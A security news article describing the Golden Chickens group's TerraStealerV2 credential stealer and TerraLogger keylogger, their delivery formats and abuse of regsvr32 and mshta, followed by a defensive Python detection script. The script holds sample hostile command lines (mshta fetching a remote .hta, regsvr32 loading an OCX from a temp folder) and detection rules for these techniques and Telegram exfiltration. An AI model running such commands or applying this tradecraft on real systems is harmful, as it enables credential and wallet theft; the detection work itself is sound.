
Golden Chickens Reemerge in 2025's Cybercrime Surge, Equipped with Two Fresh Malware Tools

A look at the tactics of the updated TerraStealerV2 malware, which targets browsers and cryptocurrency wallets. Could your login information be at risk?


Golden Chickens Are On the Move Again

The cybercriminal gang known as Golden Chickens, aka Venom Spider, is once again creating a stir, this time with a brand-new set of tools designed for large-scale credential theft, keystroke logging, and system compromise. Their latest offerings, dubbed TerraStealerV2 malware and TerraLogger, showcase the group's commitment to expanding and upgrading their Malware-as-a-Service (MaaS) solutions.

Over the years, Golden Chickens have been linked to numerous major credential theft and intrusion operations, most notably through their More_eggs malware. The new variants, however, mark a deliberate shift towards targeting browsers, crypto wallets, and user keystrokes more aggressively than before. The pair, TerraStealerV2 and TerraLogger, are being distributed in several file formats (EXE, MSI, and LNK), which makes them easy to spread and harder to spot.

Decoding TerraStealerV2 and Its Operation

TerraStealerV2 is built to siphon sensitive user data from browsers and cryptocurrency wallets. It hunts for browser credentials, goes after saved logins, and tries to extract data from browser extensions; where those extensions are used for asset management or trading, that can lead directly to crypto wallet theft. It is generally delivered as an OCX payload retrieved from dubious sites such as wetransfers[.]io, and it leverages legitimate Windows utilities, namely regsvr32.exe and mshta.exe, to execute that payload while evading detection.

Although it does attempt to steal Chrome login data, it is unable to bypass App-Bound Encryption (ABE), the protection Chrome introduced in July 2024, which suggests the tool is either still under active development or simply outdated. Whatever data TerraStealerV2 does collect is pushed to Telegram channels and external servers, giving the attackers near real-time access to user credentials and activity.

TerraLogger: A Nasty Keylogging Threat Up Close

Unlike its data-harvesting counterpart, TerraLogger takes a more straightforward approach. It is a standalone keylogger that quietly captures every keystroke typed on the infected machine, from passwords to personal chats. At present, TerraLogger neither exfiltrates data nor contacts any command-and-control (C2) server, but its design suggests it is meant to be paired with other tools in Golden Chickens' ecosystem to form a more capable infection chain.

How Are These Malware Variants Getting Spread?

Golden Chickens are using a range of file types to distribute their malware, thus increasing the chances of an infection. Common delivery formats include:

  • Executables (EXEs)
  • Microsoft Installer files (MSI)
  • Windows Shortcut files (LNK)
  • OLE Control Extensions (OCX)

The multi-format strategy raises the odds that a user will unknowingly run the malware. Once executed, the payloads get to work, harvesting data or logging keystrokes while slipping past basic antivirus checks. Worse, the use of built-in Windows utilities for execution and of Telegram for data transfer gives the operators both cover and control, since messages can be quickly edited or deleted on the attacker's side.
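As an added example (not code from the report or from the Golden Chickens tooling), the following Python scans constructed Sysmon-style process-creation and network-connection summaries for the living-off-the-land patterns described above: regsvr32.exe registering a module from a user-writable path or a remote URL, mshta.exe executing a remote or inline script, and Telegram API traffic from a process that is not a browser or Telegram client. The tab-separated event format, file paths, host names and the process allowlist are all constructed for the demo and would be tuned to your own telemetry.

```python
import re
from typing import Dict, List, Tuple

# Locations a legitimate installer or registration would not load a module from (assumption: tune per estate).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\windows\\temp\\|\\programdata\\",
    re.IGNORECASE,
)
URL = re.compile(r"https?://", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
# Processes expected to reach Telegram's API; anything else doing so deserves a look (assumption).
TELEGRAM_ALLOWLIST = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Parse one tab-separated 'Key=Value' event summary into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("\t"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires for one event (empty list = nothing suspicious)."""
    hits: List[str] = []
    exe = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if ev.get("EventType") == "ProcessCreate":
        if exe == "regsvr32.exe":
            if URL.search(cmd):
                hits.append("regsvr32_remote_scriptlet")
            if USER_WRITABLE.search(cmd) and re.search(r"\.(ocx|dll)\b", cmd, re.IGNORECASE):
                hits.append("regsvr32_user_writable_module")
        elif exe == "mshta.exe":
            if URL.search(cmd) or INLINE_SCRIPT.search(cmd):
                hits.append("mshta_remote_or_inline")
            elif USER_WRITABLE.search(cmd):
                hits.append("mshta_user_writable_hta")
    elif ev.get("EventType") == "NetworkConnect":
        host = ev.get("DestinationHostname", "").lower()
        if host == "api.telegram.org" and exe not in TELEGRAM_ALLOWLIST:
            hits.append("telegram_api_from_unexpected_process")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run every rule over each event; return (process name, fired rules) for the events that hit."""
    results: List[Tuple[str, List[str]]] = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            results.append((basename(ev.get("Image", "")), hits))
    return results


def event(*fields: str) -> str:
    return "\t".join(fields)


# Constructed sample telemetry (not real log data). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    event("EventType=ProcessCreate", r"Image=C:\Windows\System32\regsvr32.exe",
          r"CommandLine=regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\invoice.ocx",
          r"ParentImage=C:\Windows\explorer.exe"),
    event("EventType=ProcessCreate", r"Image=C:\Windows\System32\mshta.exe",
          "CommandLine=mshta.exe https://203.0.113.10/update.hta",
          r"ParentImage=C:\Windows\explorer.exe"),
    # Benign: a system DLL registered by an installer.
    event("EventType=ProcessCreate", r"Image=C:\Windows\System32\regsvr32.exe",
          r"CommandLine=regsvr32.exe /s C:\Windows\System32\msxml3.dll",
          r"ParentImage=C:\Windows\System32\msiexec.exe"),
    # A binary masquerading as svchost.exe in a user profile talking to Telegram.
    event("EventType=NetworkConnect", r"Image=C:\Users\alice\AppData\Roaming\svchost.exe",
          "DestinationHostname=api.telegram.org", "DestinationPort=443"),
    # Benign: a browser reaching Telegram's web API.
    event("EventType=NetworkConnect", r"Image=C:\Program Files\Google\Chrome\Application\chrome.exe",
          "DestinationHostname=api.telegram.org", "DestinationPort=443"),
]


if __name__ == "__main__":
    for proc, rules in scan(SAMPLE_EVENTS):
        print(f"{proc}: {', '.join(rules)}")
```

The regsvr32 rule deliberately requires both a user-writable path and an .ocx/.dll argument, so routine registrations from Program Files or System32 stay quiet; the Telegram rule is only as good as the allowlist, so expect to extend it with whatever chat or automation clients your users legitimately run.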

The Impact on Browser Security and Crypto Users

The arrival of TerraStealerV2 signals a renewed focus on browser-based attacks, since many users store passwords in browsers like Chrome and manage crypto holdings through browser extensions. A single infection could unlock access to financial platforms, crypto wallets, or even organizational intranets. The rise in crypto wallet theft via malware like TerraStealerV2 also reflects a broader trend in cybercrime: stealers are becoming more adaptable, more configurable, and harder to detect. Despite their apparent development limitations, TerraStealerV2 and TerraLogger are already a sizable concern for browser security, especially when used together.

Ongoing Threat and Future Risks

The introduction of new tools by Golden Chickens shows how actively established groups keep developing new tradecraft. Although TerraLogger currently does nothing beyond keylogging, paired with other tools in Golden Chickens' toolkit it could serve as one stage of a larger multi-stage intrusion. With reports of browser vulnerabilities and stolen crypto wallets on the rise, it is crucial to keep tabs on everything that gets downloaded, limit the use of untrusted software, and keep browsers updated so that protections such as App-Bound Encryption are actually in place. TerraStealerV2 and TerraLogger are only the starting point; the tooling will keep evolving, and so must our responses.

  1. TerraStealerV2, part of the Golden Chickens arsenal, is designed to extract sensitive data from browsers and cryptocurrency wallets, which can lead to wallet theft when the targeted extensions are used for asset management or trading.
  2. The emergence of TerraStealerV2 and its keylogging counterpart, TerraLogger, underscores the growing adaptability of stealer malware: they slip past basic antivirus checks, execute through built-in Windows utilities, and move stolen data over Telegram.
  3. Because many users store passwords in browsers like Chrome and manage crypto holdings through browser extensions, a single infection could grant unauthorized access to financial platforms, organizational intranets, or crypto wallets.
  4. Against these evolving threats, users should stay vigilant, keep browsers updated with the latest security features, limit the use of untrusted software, and closely monitor what they download.
